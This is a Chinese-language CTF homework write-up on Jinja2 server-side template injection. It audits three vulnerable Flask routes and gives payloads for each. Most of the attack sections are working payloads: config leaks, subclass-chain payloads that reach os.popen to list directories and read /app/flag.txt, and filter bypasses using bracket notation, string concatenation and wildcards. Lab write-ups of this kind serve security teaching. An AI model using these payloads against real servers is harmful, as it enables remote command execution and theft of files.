班级作业笔记报告0x10

SSTI模板注入漏洞

作业1:

SSTI魔术方法

代码审计

加载flag模块中的FLAG,返回源代码,判断/shrine/路由传入的内容,将小括号()过滤为空,设置aaa字符串为黑名单,把黑名单字符设置为None,防止利用,调用render_template_string渲染模板

测试传入{{1+1}}一般输出2

获取flag,传入/shrine/{{config}},或者/shrine/{{url_for.globals'current_app'.config'FLAG'}}

作业2:

SSTI循环语句

典型JinJa2 SSTI注入

代码审计

GET传参,接收name参数,直接拼接使用Template()

方法1:

直接getshell

?name={{request.class.base.subclasses()200.init.globals'os'.popen('ls /').read()}}

执行了find / -type f -name "flag*"看到flag在/app/flag.txt中

继续执行cat /app/flag.txt查看flag

方法2:

第二种方法,也是正解

{% for c in \[\].class.base.subclasses() %}

{% if c.name == 'catch_warnings' %}

{% for b in c.init.globals.values() %}

{% if b.class == {}.class %}

{% if 'eval' in b.keys() %}

{{ b'eval'('import("os").popen("cat /app/flag.txt").read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

作业3:

SSTIbypass

代码审计

GET传参id参数,正则匹配过滤system字段、双引号"和英文句号.,没有匹配到直接执行render_template_string函数

方法1:

可以利用上题方法一的解,变一下就行,把点.换成中括号,依旧getshell

?id={{request'__class__''__base__''__subclasses__'()200'__init__''__globals__''os''popen'('ls /')'read'()}}

根目录的flag依旧假的,flag依旧在/app/flag.txt中,不过这需要一点点绕过知识,因为flag文件名字是flag.txt,包含了后端过滤的内容英文句号.,我们可以换成通配符执行命令获取flag

cat /app/flag.txt #会坠机

cat /app/flag*

方法2:

这个是正解的payload,也是一样的效果,只不过我嫌他长但是压不住他细又强

{% for c in \[\]'__cla'+'ss__''__ba'+'se__''__subcla'+'sses__'() %}

{% if c.name == 'catch_warnings' %}

{% for b in c.init.globals.values() %}

{% if b'__cla'+'ss__' == {}'__cla'+'ss__' %}

{% if 'eval' in b.keys() %}

{{ b'eval'('import(\'os\').popen(\'cat flag.txt\').read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

个人评价:

SSTI漏洞(服务器端模板注入),触发语言python、Java、Go等,现在主要用的是java,其实是python,本文更侧重python中的SSTI漏洞,作者菜鸡没怎么学,只能说挺好玩的,学起来很轻松,每步都是探索

相关推荐
郑州光合科技余经理7 分钟前
同城外卖小程序开发:下单成功后,后台导出能不能对上用户端状态
开发语言·前端·git·后端·uni-app·php·ai编程
知识分享小能手17 分钟前
C++ 学习教程,从入门到精通,C++ 入门知识 — 完整知识点(1)
开发语言·c++·学习
MyFreeIT18 分钟前
Android PHP Manual
php
迪康Defender40 分钟前
终端安全实战:如何高效解决企业U盘泄密与管控难题
运维·网络·安全·web安全·终端安全管理
网安小学生(兼顾数据库版)1 小时前
固件+软件供应链:ONEKEY+Mend如何实现全链路安全覆盖
网络·安全·web安全
马可家的菠萝2 小时前
你收藏的资料,有多少真的被你第二次打开过?
笔记·知识管理·效率提升·个人知识库
珠海西格电力2 小时前
零碳园区管理系统“智慧大脑”功能对园区运营成本的影响有哪些?
大数据·人工智能·安全·系统架构·能源
小刘在重生~3 小时前
Java Lock 显式锁案例|ReentrantLock 解决多线程安全问题(超详细实战)
java·笔记·面试
职豚求职小程序3 小时前
中国人寿27秋招笔试[特殊字符]北森机考|备考攻略
笔记
江湖人称菠萝包3 小时前
【Qt】《Qt 5.9 C++开发指南》笔记-Chapter9-Qt Charts
笔记·qt·qt5